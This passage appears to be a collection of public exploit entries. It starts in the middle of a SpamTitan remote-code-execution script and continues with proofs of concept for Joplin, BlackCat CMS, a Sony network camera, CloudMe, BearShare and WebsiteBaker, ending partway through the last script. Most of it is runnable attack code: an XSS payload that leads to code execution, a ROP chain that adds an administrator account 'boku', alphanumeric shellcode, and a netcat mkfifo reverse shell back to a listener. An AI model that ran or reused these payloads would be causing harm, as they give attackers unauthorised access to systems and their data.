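    if (cookies is None):
        fail("Error authenticating. Are you providing valid credentials?")
        exit(2)
    success("User logged in successfully.")

    rce_methods = {
        1: ("CVE-2020-11699", CVE_2020_11699),
        2: ("CVE-2020-11803", CVE_2020_11803),
        3: ("CVE-2020-11804", CVE_2020_11804),
    }
    if method in rce_methods:
        cve, trigger = rce_methods[method]
        info("Exploiting %s to get a reverse shell on %s:%s" % (cve, ip, port), quiet)
        # The triggering request blocks while the shell lives, so it runs in
        # a worker thread (after its 5s grace period) while this thread listens.
        rev_thread = threading.Thread(target=trigger, args=(cookies, target, shellurl))
        rev_thread.start()
        # Open the reverse shell listener in this main thread
        info("Spawning a reverse shell listener. Wait for it...")
        shellServer(options.ip, int(options.port), options.quiet)
    else:
        info("Reading file '%s' by abusing CVE-2020-11700." % rfile, quiet)
        CVE_2020_11700(cookies, target, rfile)
    exit(0)


if __name__ == "__main__":
    main()
---------------------------------------------

IV. Impact
~~~~~~~~~~~
Loss of confidentiality, integrity and availability of several files in the target server, as well as loss of availability of several services running in the SpamTitan. Confidentiality of critical system files, such as /etc/passwd or /etc/pwd.db would be highly impacted.

V. Disclosure
~~~~~~~~~~~~~~
Reported By: Felipe Molina de la Torre
Vendor Informed: 2020-04-17
Patch Release Date: 2020-05-26
Advisory Release Date: 2020-09-18

VI.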
References ~~~~~~~~~~~~~ * https://sensepost.com/blog/2020/clash-of-the-spamtitan/ * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11699 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11700 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11803 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11804 ---------------------------------[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution]---
Joplin 1.0.245 - Arbitrary Code Execution (PoC)
# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC) # Date: 2020-09-21 # Exploit Author: Ademar Nowasky Junior (@nowaskyjr) # Vendor Homepage: https://joplinapp.org/ # Software Link: https://github.com/laurent22/joplin/releases/download/v1.0.245/Joplin-Setup-1.0.245.exe # Version: 1.0.190 to 1.0.245 # Tested on: Windows / Linux # CVE : CVE-2020-15930 # References: # https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff # 1. Technical Details # An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag. # HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through window.open() have node integration enabled to achieve ACE. # If Joplin API is enabled, Remote Code Execution with user interaction is possible by abusing the lack of required authentication in Joplin 'POST /notes' api endpoint to remotely deploy the payload into the victim application. # 2. PoC # Paste the following payload into a note: <embed src="data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)</script>"> # 2.1 RCE with user interaction # Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit. # By default, notes are stored in the last notebook created. <!-- exploit.html --> <script> x = new XMLHttpRequest; j = { title: "CVE-2020-15930", body: "<embed src='data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)<\/script>'>" }; x.open("POST", "http://127.0.0.1:41184/notes"); x.send(JSON.stringify(j)); </script> # To create a note in other notebooks you need the notebook ID. It's possible to get the victim's notebooks IDs due to a relaxed CORS policy in 'GET /folders' endpoint. 
<!-- notebooks.html --> <script> x = new XMLHttpRequest(); x.onreadystatechange = function() { if (x.readyState == XMLHttpRequest.DONE) { alert(x.responseText); } } x.open('GET', 'http://127.0.0.1:41184/folders'); x.send(); </script>
BlackCat CMS 1.3.6 - Cross-Site Request Forgery
# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery
# Date: 2020-06-01
# Exploit Author: Noth
# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS
# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
# Version: v1.3.6
# CVE : CVE-2020-25453

BlackCat CMS v1.3.6 has a CSRF vulnerability: the anti-CSRF token check can be bypassed by submitting the __csrf_magic field with an empty value, so a forged cross-site POST is accepted. The original write-up describes the impact as "remote arbitrary code execution"; the PoC below, however, only demonstrates a forged login submission with attacker-supplied credentials (a login CSRF against backend/login/ajax_index.php) — no code-execution step is shown here.

PoC (Remove the csrf_token value): <input type="hidden" name="__csrf_magic" value=""/>
-------------------------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php" method="POST">
<input type="hidden" name="__csrf_magic" value=""/>
<input type="hidden" name="username_fieldname" value="username_274807982ed4"/>
<input type="hidden" name="password_fieldname" value="password_75868428f837"/>
<input type="hidden" name="_cat_ajax" value="1"/>
<input type="hidden" name="username_274807982ed4" value="accountname"/>
<input type="hidden" name="password_75868428f837" value="yourpassword"/>
<input type="submit" value="Submit request"/>
</form>
</body>
</html>
Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow
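# Exploit Title: Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow
# Google Dork: Server: Mida eFramework
# NOTE(review): the dork above names "Mida eFramework", which is not this
# product; verify it before relying on it.
# Date: 2020-09-30
# Exploit Author: LiquidWorm
# Vendor Homepage: https://pro.sony
# Version: <= 1.82.01
#!/usr/bin/env python
#
#
# Sony IPELA Network Camera (ftpclient.cgi) Remote Stack Buffer Overflow
#
#
# Vendor: Sony Electronics Inc.
# Product web page: https://pro.sony
# Affected version: SNC-DH120T v1.82.01
#
#
# Summary: IPELA is Sony's vision of the ultimate workplace, designed to revolutionize
# the way business communicates over global IP networks. IPELA products can improve the
# efficiency of your organization by connecting people and places with high-quality audio
# and video. The SNC-DH120T is an indoor tamper proof, high definition (720p) minidome
# network security camera with Electronic Day/Night settings, DEPA analysis and is ONVIF
# compliant. It supports dual streaming of H.264, MPEG-4 and JPEG at full frame-rate.
#
# Desc: The vulnerability is caused due to a boundary error in the processing of received
# FTP traffic through the FTP client functionality (ftpclient.cgi), which can be exploited
# to cause a stack-based buffer overflow when a user issues a POST request to connect to a
# malicious FTP server. Successful exploitation could allow execution of arbitrary code on
# the affected device or cause denial of service scenario.
#
# Tested on: gen5th/1.x
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5596
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5596.php
# Fixed in 1.88.0.0: https://pro.sony/en_NL/support-resources/snc-dh120/software/mpengb00000928
#
#
# 28.10.2019
#
# PoC:
# Trigger:
# Note (review): the trigger is an *authenticated* request to the camera
# (Basic YWRtaW46YWRtaW4= is admin:admin in this example); it tells the
# camera's FTP client to connect out to FcServerName, where this script
# must already be listening.
# curl 'http://10.0.0.3:5080/command/ftpclient.cgi' \
# -H 'Connection: keep-alive' \
# -H 'Cache-Control: max-age=0' \
# -H 'Authorization: Basic YWRtaW46YWRtaW4=' \
# -H 'Upgrade-Insecure-Requests: 1' \
# -H 'Origin: http://10.0.0.3:5080' \
# -H 'Content-Type: application/x-www-form-urlencoded' \
# -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36' \
# -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
# -H 'Referer: http://81.83.17.200:5080/en/l4/ftp/common.html' \
# -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
# --data 'FtpClientFunc=on&FcServerName=10.0.0.5&FcUserName=EVIL&FcPassword=NONESO&FcPassive=off&reload=referer' \
# --compressed \
# --insecure
#
#
# Observed fixed version log:
# 2020-07-27 17:48:03 FTP client Unexpected error occurred during FTP client operation.
#
import socket

HOST = '127.0.0.1'  # 10.0.0.5 - must match FcServerName in the trigger request
PORT = 21  # binding a port below 1024 needs root on Unix hosts


def build_payload(a_len=100000, b_len=10000, c_len=1000):
    """Return the oversized reply that overflows the camera's stack buffer.

    Layout is the original PoC's: a_len 'A's, then b_len 'B's, then c_len
    'C's, newline-terminated.  The distinct letters make it easy to tell
    from a crash dump which region of the payload landed where.
    """
    return b"A" * a_len + b"B" * b_len + b"C" * c_len + b"\n"


def serve(host=HOST, port=PORT):
    """Accept one FTP client connection and answer every message with the payload.

    As in the original PoC, nothing is sent until the client sends
    something first; the loop ends when the client closes the connection.
    Runs under Python 2 or 3 (the original used a Python 2 print statement
    and a str payload).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # quick re-runs after a crash
    srv.bind((host, port))
    srv.listen(1)
    conn, addr = srv.accept()
    print('Connection from %s:%s' % addr)
    try:
        while True:
            data = conn.recv(1024)
            if not data:
                break
            conn.sendall(build_payload())
    finally:
        conn.close()
        srv.close()


if __name__ == '__main__':
    serve()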
CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR)
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR) # Exploit Author: Bobby Cooke (boku) # CVE: CVE-2018-6892 # Date: 2020-09-29 # Vendor Homepage: https://www.cloudme.com/ # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe # Version: 1.11.2 # Tested On: Windows 10 (x64) - 10.0.19041 Build 19041 # Script: Python 2.7 # Notes: # This exploit uses MSVCRT.System to create a new user (boku:0v3R9000!) and add the new user to the # Administrators group. A requirement of successful exploitation is the CloudMe.exe process must be # running as adminstrator, such as when ran with 'Run as Administrator'; as this permission is required # to create new users on the system. This exploit has been tested against multiple Windows 10 systems # including x86, x64, Pro, Education, Home; although there is no guarantee it will work in your CTF. # CloudMe 1.11.2 - Turing Complete Add-Admin ROP (DEP,ASLR) import os,sys,socket,struct from colorama import Fore, Back, Style F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE] S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] err = S[3]+F[2]+'<========'+F[2]+'['+F[5]+'+++'+F[2]+'( '+F[0]+S[0] def formatMsg(STRING): return ok+S[3]+F[5]+STRING+S[0] def formatErr(STRING): return err+S[3]+F[2]+STRING+S[0] # Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename # ------------------------------------------------------------------------------------------------------- # 0x69900000 | 0x69ac1000 | False | False | False | False | False | [Qt5Network.dll] # 0x6eb40000 | 0x6eb64000 | False | False | False | False | False | [libgcc_s_dw2-1.dll] # 0x68a80000 | 0x69055000 | False | False | False | False | False | [Qt5Core.dll] # 0x00400000 | 0x00831000 | False | False | False | False | 
False | [CloudMe.exe] # 0x6d9c0000 | 0x6da0c000 | False | False | False | False | False | [Qt5Sql.dll] # 0x64b40000 | 0x64b5b000 | False | False | False | False | False | [libwinpthread-1.dll] # 0x66e00000 | 0x66e3d000 | False | False | False | False | False | [Qt5Xml.dll] def getESP_RC(): GaDG3Tz = [ # ESP -> EDI # Clobbers: BL # [EBX+5E5B10C4] must be writable # Requires ROPNOP # Address=68F79000 Size=0007A000 (499712.) Owner=Qt5Core 68A80000 Section=.eh_fram Type=Imag 01001002 Access=RWE CopyOnWr 0x68bb4678, # POP EBX # RETN [Qt5Core.dll] 0x0A9C8F3C, # EBX + 0x5E5B10C4 = 0x68F7A000 = Writeable Memory 0x68d5e818, # PUSH ESP # OR BL,DL # INC DWORD PTR DS:[EBX+5E5B10C4] # POP EDI # RETN 0x04 [Qt5Core.dll] 0x68D50537, # RETN - ROPNOP 0x68D50537 # RETN - ROPNOP ] print(formatMsg("Get ESP ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def msvcrt_rop_chain(): GaDG3Tz = [ # HMODULE LoadLibraryA( LPCSTR lpLibFileName); # $ ==> > CALL to LoadLibraryA # $+4 > FileName = "msvcrt.dll" # EAX = 0x512 = 1298 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFAEE, # NEG FFFFFAEE = 0x512 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "msvcrt.dll" 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "msvcrt.dll" 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -0xA = 0xFFFFFFF6 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFF6, # -0xA # ESI = Start of string "msvcrt.dll\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] # EAX = PTR LoadLibraryA (from CloudMe Import Table) # CloudMe 
Address=0081A168 Section=.idata Type=Import (Known) Name=KERNEL32.LoadLibraryA 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFF7E5E98, # NEG FF7E5E98 = 0081A168 = PTR Kernel32.LoadLibraryA 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = kernel32.LoadLibraryA 0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] # ESI = kernel32.LoadLibraryA # EAX = Addr string "msvcrt.dll\x00" 0x68d50536, # XCHG EAX,ESI # RETN [Qt5Core.dll] # For PUSHAD we need: EDI=FarRETN # ESI=&LoadLibraryA # EAX=["msvcrt.dll"] # ECX=ROPNOP 0x68d32800, # POP ECX # RETN [Qt5Core.dll] 0x68D50537, # RETN - ROPNOP 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 0x6990F972, # RETN 10 [Qt5Network.dll] 0x68f7bc5e, # pushad # ret # [Qt5Core.dll] # EAX -> EBP = msvcrt.dll 0x68cc462c # XCHG EAX,EBP # RETN [Qt5Core.dll] # EBP = msvcrt.dll ] print(formatMsg("LoadLibraryA(LPSTR \"msvcrt.dll\") ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def GetProc_system_rop_chain(): GaDG3Tz = [ # FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName); # $ ==> > CALL to GetProcAddress # EDX (ROPNOP) # $+4 > hModule = [msvcrt] # ECX # $+8 > ProcNameOrOrdinal (system) # EAX # EAX = 0x4a2 = 1186 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFB5E, # NEG FFFFFB5E = 0x4A2 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "system" 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "system" 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -0x6 = 0xFFFFFFFA 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFA, # -0x6 # ESI = Start of string 
"system\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] 0x68fcf58d, # DEC EBP # RETN [Qt5Core.dll](fix EBP for prev gadgets) # EAX = PTR GetProcAddr (from CloudMe Import Table) # CloudMe Address=0081A148 # Section=.idata # Type=Import # Name=KERNEL32.GetProcAddress 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFF7E5EB8, # NEG FF7E5EB8 = 0081A148 = PTR Kernel32.GetProcAddr 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] 0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # ESI = &kernel32.GetProcAddr # ECX=["system\x00"]# EBP=msvcrt.dll # For PUSHAD we need: EDI=FarRETN # ESI=&GetProcAddress # ECX=msvcrt.dll # EAX=["system"]# EDX=ROPNOP # EBP -> EAX = msvcrt.dll 0x68cc462c, # XCHG EAX,EBP # RETN [Qt5Core.dll] # ECX=&msvcrt.dll # EAX=["system\x00"] 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # EDX=ROPNOP 0x68f94685, # POP EDX # RETN [Qt5Core.dll] 0x68D50537, # RETN - ROPNOP # EDI=FarRETN 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 0x699010B4, # ret 0C [Qt5Network.dll] # KERNEL32.GetProcAddress [ESI pushed to stack] # [EBP pushed to stack] # [ESP pushed to stack] # [EBX pushed to stack] # land after ret 0xC -> Qt5Core.68D50537 (ROPNOP) [EDX pushed to stack] # MSVCRT.75F60000 [ECX pushed to stack] # ASCII "system" [EAX pushed to stack] 0X68f7bc5e, # pushad # ret # [Qt5Core.dll] 0x68b1df17 # XCHG EAX,EDX # RETN # [Qt5Core.dll] # EDX = msvcrt.system ] print(formatMsg("GetProcAddress(HMODULE msvcrt, LPCSTR system) ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def addUsr_rop_chain(): GaDG3Tz = [ # int system( const char *command); # $ ==> > CALL to system # $+4 > command = "net user boku 0v3R9000! /add" # EAX = 0x438 = 1080 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFBC8, # NEG 0xFFFFFBC8 = 0x438 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "net user..." 
0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "net user..." 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -28 = -0x1C = 0xFFFFFFE4 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFE4, # -28 = -0x1C # ESI = Start of string "net user...\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] # EDX = MSVCRT.system # ECX=0x0 # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net user.."] # ECX=POP+RET 0x68d32800, # POP ECX # RETN [Qt5Core.dll] 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] # ESI = MSVCRT.system # EAX = ["net user.."] 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] # EDI=FarRETN 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 0x6990F972, # RETN 10 [Qt5Network.dll] # PUSHAD - Setup Call to MSVCRT.system on stack 0X68f7bc5e # pushad # ret # [Qt5Core.dll] ] print(formatMsg("system(const char* \"net user boku 0v3R9000! /add\") ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def addAdm_rop_chain(): GaDG3Tz = [ # ESI = msvcrt.system # ESI -> EDX 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] # EAX = 0x3F7 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFC09, # NEG 0xFFFFFC09 = 0x3F7 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "net local..." 
0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "net local..." 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -39 = -0x27 = 0xFFFFFFE4 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFD9, # -39 = -0x27 # ESI = Start of string "net local...\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] # EDX = MSVCRT.system # ECX=0x0 # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net local.."] # ECX=ROPNOP 0x68d32800, # POP ECX # RETN [Qt5Core.dll] 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] # ESI = MSVCRT.system # EAX = ["net local.."] 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] # EDI=FarRETN 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 0x6990F972, # RETN 10 [Qt5Network.dll] # PUSHAD - Setup Call to MSVCRT.system on stack 0X68f7bc5e # pushad # ret # [Qt5Core.dll] ] print(formatMsg("system(const char* \"net localgroup Administrators boku /add\") ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def sendRecv(s,p): print(formatMsg("Sending payload: ")) print(S[3]+F[7]+payload+S[0]) s.send(p) data = s.recv(1024) return data def header(): head = S[3]+F[2]+' --- Cloudme v1.12 | Add Admin (boku:0v3R9000!) ---\n'+S[0] return head def sig(): SIG = S[3]+F[4]+" .-----.._ ,--.\n" SIG += F[4]+" | .. > ___ | | .--.\n" SIG += F[4]+" | |.' ,'-'"+F[2]+"* *"+F[4]+"'-. 
|/ /__ __\n" SIG += F[4]+" | </ "+F[2]+"* * *"+F[4]+" \ / \\/ \\\n" SIG += F[4]+" | |> ) "+F[2]+" * *"+F[4]+" / \\ \\\n" SIG += F[4]+" |____..- '-.._..-'_|\\___|._..\\___\\\n" SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0] return SIG def footer(): foot = formatMsg('Requires that the Cloudme program is ran using \'Run As Administrator\'\n') return foot if __name__ == "__main__": print(header()) print(sig()) print(footer()) if len(sys.argv) != 3: print(formatErr("Usage: python %s <IP> <PORT>" % sys.argv[0])) print(formaterr("Example: python %s '127.0.0.1' 8888" % sys.argv[0])) sys.exit(-1) host = sys.argv[1] port = int(sys.argv[2]) rop_chain = getESP_RC() + msvcrt_rop_chain() + getESP_RC() + GetProc_system_rop_chain() + getESP_RC() + addUsr_rop_chain() + getESP_RC() + addAdm_rop_chain() os_EIP = '\41'*1052 os_nSEH = '\x41'*(2344-len(os_EIP + rop_chain)) nSEH = '\x42'*4 SEH = '\x43'*4 buff = os_EIP + rop_chain + os_nSEH + nSEH + SEH term = '\r\n' kern32 = 'msvcrt.dll'+'AAAAAA' winExe = 'system'+'BBBBBB' addUsr = 'net user boku 0v3R9000! /add'+'CCCC' addAdm = 'net localgroup Administrators boku /add'+'DDDD' rmdr = '\x44'*(3854-len(buff)-len(kern32)-len(winExe)-len(addAdm)) payload = buff + kern32 + winExe + addUsr + addAdm + rmdr + term try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host,port)) print(formatMsg( "Successfully connected to "+host+" on port "+str(port))) resp = sendRecv(sock,payload) print(formatMsg("Closing Socket")) sock.close() print(formatErr("Exiting python script.")) except: print(formatErr("Failed to connect and send payload."))
BearShare Lite 5.2.5 - 'Advanced Search' Buffer Overflow (PoC)
# Title: BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC) # Date: 2020-09-29 # Author: Christian Vierschilling # Vendor Homepage: http://www.bearshareofficial.com/ # Software Link: http://www.oldversion.com.de/windows/bearshare-lite-5-2-5 # Versions: 5.1.0 - 5.2.5 # Tested on: Windows 10 x64 EN/DE # CVE: NA # --- EXPLOTATION INSTRUCTIONS --- # # 1. Adjust the values for "jmp_esp" and "shellcode" if needed # 2. Run the script to generate a file pwn.txt, containing your payload # 3. Open pwn.txt on your target (!!) (e.g. in the browser or locally) and copy the contents into the clipboard # 4. Start BearShare, click on "Advanced..." and a new window will pop up. Put the payload from pwn.txt into the field "Keywords:" within the new window. Click on "Search" in this window and your payload will be executed. # --- PAYLOAD CONSTRUCTION --- # #!/usr/bin/python import binascii # Detected the offset for overwriting the EIP register using pattern_create and pattern_offset: [*] Exact match at offset 524 junk1 = 524*"A" # Address for a JMP ESP instruction found in MSVBVM60.DLL using mona.py (You will probably need to adjust this if using another OS, language etc.) # \x66\x06\x05\x35 jmp_esp = binascii.unhexlify('35050666') # Using another 4 bytes to align the stack for clean shellcode execution junk2 = 4*"B" # As we are limited to only being able to insert alphanumeric characters, we'll create an appropriate shellcode using msfvenom. 
Copy the output off the following command into the variable "shellcode" below: # msfvenom -p windows/exec cmd=calc.exe BufferRegister=esp -e x86/alpha_mixed shellcode = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8k2s0C0ePsPmYKUFQKpu4nk2ptpLKf26lLK3bTTNk1bexVoH7aZWVuaiollUl3QSLtBTlepyQZofmWqZgIrjRqBrwlKRrvpLK3zgLnkbl4Qt8hc3xc1HQv1lK2ya05QkcLK3ytXzCtzg9LKednkvaN6UaioNLzaZotM7qzgvXkPQeJVEScMIhWKQmq4T5xdChnkcha47qYCPfnkFlpKlKaHeLgqjsnk6dLKc1HPlI0Da4FDqKSkE1V9CjcaYoypcoaO0ZlKTRZKnm3msZ7qnmMUX230s05Pbpe8dqNkPoMWkO9EMkHpmenBcfU8MvnuMmMMKO9EelTFQlEZK0Ikm0puWumk1WuCD2PosZ7p1CyoxU3Se1bLbCDn55qhCUuPAA" # assemble payload payload = junk1 + jmp_esp + junk2 + shellcode # write payload into pwn.txt f = open("pwn.txt", 'w') f.write(payload) f.close()
WebsiteBaker 2.12.2 - Remote Code Execution
# Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution # Date: 2020-07-04 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://websitebaker.org/pages/en/home.php # Software Link: https://wiki.websitebaker.org/doku.php/downloads # Version: 2.12.2 # Tested on: Windows 10 and Ubuntu 18.04 # Note : You start listener before execute (e.g netcat) then procide listener ip and port import requests import re from bs4 import BeautifulSoup import sys import getopt options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport=']) for opt, arg in options: if opt in ('-h'): print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT') exit() elif opt in ('-t'): main_url = arg elif opt in ('-u'): usr = arg elif opt in ('-p'): passwd = arg elif opt in ('-i', '--lhost'): lhost = arg elif opt in ('-l' , '--lport'): lport = arg reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f" shell_code_eval = "echo system('"+ reverse_shell_code + "');" print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n") ##LOGIN PAGE HTML PARSE FOR LOGIN PARAMS url = main_url+"/admin/login/index.php" req = requests.get(url) login_page = req.text soup = BeautifulSoup(login_page, 'html.parser') username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value'] password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value'] weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name'] weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value'] #LOGIN TO GET SESSIoN_COOKIE login_page = requests.Session() burp0_url = main_url+"/admin/login/index.php" burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : weird_val, username_par : usr, password_par : passwd, "submit": ''} r = 
